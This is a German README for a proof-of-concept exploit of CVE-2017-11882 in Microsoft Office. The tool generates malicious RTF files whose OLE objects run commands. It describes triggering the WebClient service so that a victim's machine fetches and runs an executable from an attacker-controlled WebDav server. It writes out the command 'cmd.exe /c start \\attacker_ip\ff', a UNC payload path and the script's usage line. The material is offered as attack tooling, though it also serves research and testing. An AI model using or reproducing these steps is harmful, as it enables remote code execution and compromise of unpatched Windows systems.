
Proof-of-Concept-Exploit für CVE-2017-11882 mit WebDav-basierter Remote-Ausführung, der bösartige RTF-Dokumente erzeugt, um über OLE-Objekte die Ausführung von Befehlen auszulösen.
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
Ein einfacher PoC für CVE-2017-11882. Dieser Exploit löst den WebClient-Dienst aus, um eine Remote-Datei von einem vom Angreifer kontrollierten WebDav-Server zu starten und auszuführen. Der Grund, warum dieser Ansatz nützlich sein könnte, ist die Begrenzung der Länge des ausgeführten Befehls. Mit Hilfe von WebDav ist es jedoch möglich, eine beliebige vom Angreifer kontrollierte ausführbare Datei auf dem anfälligen Rechner zu starten. Dieses Skript erstellt ein einfaches Dokument mit mehreren OLE-Objekten. Diese Objekte nutzen CVE-2017-11882 aus, was zu einer sequentiellen Befehlsausführung führt.
Der erste Befehl, der den Start des WebClient-Dienstes auslöst, könnte wie folgt aussehen:
cmd.exe /c start \\attacker_ip\ff
Der vom Angreifer kontrollierte Binärpfad sollte ein UNC-Netzwerkpfad sein:
\\attacker_ip\ff\1.exe
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
Der Ordner example enthält eine .rtf-Datei, die die Sicherheitslücke CVE-2017-11882 ausnutzt und den Rechner im System startet.